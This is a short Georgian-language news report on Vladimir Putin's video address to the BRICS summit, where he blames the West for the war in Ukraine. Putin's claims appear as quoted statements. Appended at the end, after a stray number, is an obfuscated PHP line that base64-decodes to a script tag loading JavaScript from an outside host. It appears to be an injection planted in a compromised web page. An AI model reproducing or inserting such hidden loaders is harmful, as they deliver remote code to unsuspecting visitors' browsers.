celsiusi
ავერსი შნაიდერი

 რუსეთის პრეზიდენტმა უკრაინაში მიმდინარე ომში დასავლეთი დაადანაშაულა. ამის შესახებ ვლადიმერ პუტინმა სამხრეთ აფრიკაში მიმდინარე „ბრიკსის“ სამიტის მონაწილეებისადმი ვიდეომიმართვაში ისაუბრა.

„ზოგიერთი ქვეყნის მისწრაფებამ, შეინარჩუნონ საკუთარი ჰეგემონია, მიგვიყვანა მძიმე კრიზისთან უკრაინაში. ჯერ დასავლეთის ქვეყნების დახმარებით უკრაინაში ანტიკონსტიტუციური სახელმწიფო გადატრიალება მოაწყვეს; შემდეგ კი იმ ხალხის წინააღმდეგ, ვინც ამ სახელმწიფო გადატრიალებას არ დაეთანხმა, ომი გააჩაღეს, სასტიკი და გამანადგურებელი ომი რვა წლის განმავლობაში. რუსეთმა მიიღო გადაწყვეტილება, მხარი დაუჭიროს იმ ხალხს, რომელიც იბრძვის საკუთარი კულტურისთვის, ტრადიციებისთვის, ენისა და მომავლისთვის. ჩვენი ქმედებები უკრაინაში მხოლოდ ერთადერთი რამით არის ნაკარნახევი – ბოლო მოვუღოთ იმ ომს, რომელიც დასავლეთმა და მისმა სატელიტებმა გააჩაღეს დონბასში მცხოვრები ხალხის წინააღმდეგ“, – განაცხადა პუტინმა.

რუსეთის პრეზიდენტმა მადლობა გადაუხადა „ბრიკსის“ წევრებს, რომლებიც უკრიანაში მიმდინარე ომის შეჩერებას მშვიდობიანი გზით ცდილობენ.

380
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");